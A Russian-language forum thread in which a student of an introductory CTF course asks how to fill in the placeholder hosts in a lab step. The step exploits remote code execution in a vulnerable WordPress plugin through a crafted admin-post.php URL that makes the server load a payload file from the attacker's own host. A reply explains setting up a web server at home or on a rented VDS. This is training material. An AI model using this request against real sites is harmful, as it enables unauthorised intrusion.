Прохождение курса Введение в CTF

  • Автор темы Автор темы Lastweek
  • Дата начала Дата начала

Lastweek

New member
07.11.2025
1
0
Всем доброго времени суток!
Проходя курс Введение в CTF столкнулся с проблемой
В Разделе 6 - Эксплуатируем RCE в уязвимом плагине WordPress
Согласно инструкции теперь нам нужно посетить следующую страницу - http://уязвимый_сервер/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://сервер_где_расположен_наш_файл/payload.txt:


Untitled



  1. Указываем уязвимый сервер, не забывая про порт 18500.
  2. Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3
Как найти "http://сервер_где_расположен_наш_файл/" ?
Что значит "Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3"?
 
Всем доброго времени суток!
Проходя курс Введение в CTF столкнулся с проблемой
В Разделе 6 - Эксплуатируем RCE в уязвимом плагине WordPress
Согласно инструкции теперь нам нужно посетить следующую страницу - http://уязвимый_сервер/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://сервер_где_расположен_наш_файл/payload.txt:


Untitled



  1. Указываем уязвимый сервер, не забывая про порт 18500.
  2. Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3
Как найти "http://сервер_где_расположен_наш_файл/" ?
Что значит "Указываем IP-адрес или домен нашего VDS, а также порт, который мы написали в команде с python3"?
Добрый день! Это значит вам нужно развернуть свои Web Сервер или воспользоваться готовым если у вас его нет. Развернуть вы его можете как у себя на домашнем ПК, не забыв настроить NAT (пробросить порты на роутере домашнем) или арендовать сервер VDS и там поднять Web Сервер
 
  • Нравится
Реакции: Lastweek
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы